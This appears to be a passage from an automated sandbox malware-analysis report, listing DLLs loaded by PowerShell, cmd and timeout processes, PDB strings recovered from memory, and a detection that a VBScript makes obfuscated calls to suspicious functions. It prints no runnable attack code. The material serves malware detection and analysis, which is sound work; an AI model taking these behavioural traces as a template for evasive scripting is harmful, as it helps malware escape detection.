Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: \??\C:\Windows\dll\System.Core.pdbb%R source: powershell.exe, 0000001D.00000002.2782843714.0000020CF10FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.Powershell.PSReadline.pdbpdbine.pdb source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: omation.pdbJ source: powershell.exe, 0000000D.00000002.2425636470.0000025C60164000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb* source: powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb7 source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FDFF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2423231482.0000025C5FDFF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF10FD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2787244921.0000020CF1482000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb; source: powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDB source: powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000003.00000002.1764714970.000001D0F57E4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: omation.pdb\s' source: powershell.exe, 00000014.00000002.2662631561.000001F3AE856000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbx source: powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactivene.PDB source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.Powershell.PSReadline.pdb` source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb00525341310004000001000100b5fc90e7027f67871e773a8fde8938c81dd402ba65b9201d60593e96c492651e889cc13f1415ebb53fac1131ae0bd333c5ee6021672d9718ea31a8aebd0da0072f25d87dba6fc90ffd598ed4da35e44c398c454307e8e33b8426143daec9f596836f97c8f74750e5975c64e2189f0 source: powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\Z:\syscalls\amsi_trace64.amsi.csv.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: omation.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C60164000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb]%K source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sn.pdb source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdbowW source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF10FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\Z:\syscalls\amsi64_7184.amsi.csve.pdb(V source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\mscorlib.pdb source: powershell.exe, 00000003.00000002.1764714970.000001D0F58B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb001000100b5fc90e7027f67871e773a8fde8938c81dd402ba65b9201d60593e96c492651e889cc13f1415ebb53fac1131ae0bd333c5ee6021672d9718ea31a8aebd0da0072f25d87dba6fc90ffd598ed4da35e44c398c454307e8e33b8426143daec9f596836f97c8f74750e5975c64e2189f source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: e.pdb source: powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FDFF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2787244921.0000020CF1482000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 00000003.00000002.1764714970.000001D0F57E4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: omation.pdb.s source: powershell.exe, 00000014.00000002.2662631561.000001F3AE856000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdbT source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdbq source: powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb? source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbZ] source: powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdbF source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FDFF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1764714970.000001D0F58B6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb37-8B11-F424491E3931}\InprocServer320805 source: powershell.exe, 00000014.00000002.2491608753.000001F39452D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdby source: powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Core.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbs% source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF10FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb189>K source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb29; source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C60164000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb37-8B11-F424491E3931}\InprocServer3281dd402ba65b9201d60593e96c492651e889cc13f1415ebb53fac1131ae0bd333c5ee6021672d9718ea31a8aebd0da0072f25d87dba6fc90ffd598ed4da35e44c398c454307e8e33b8426143daec9f596836f97c8f74750e5975c64e2189f source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbf source: powershell.exe, 00000014.00000002.2662631561.000001F3AE856000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
VBScript performs obfuscated calls to suspicious functions
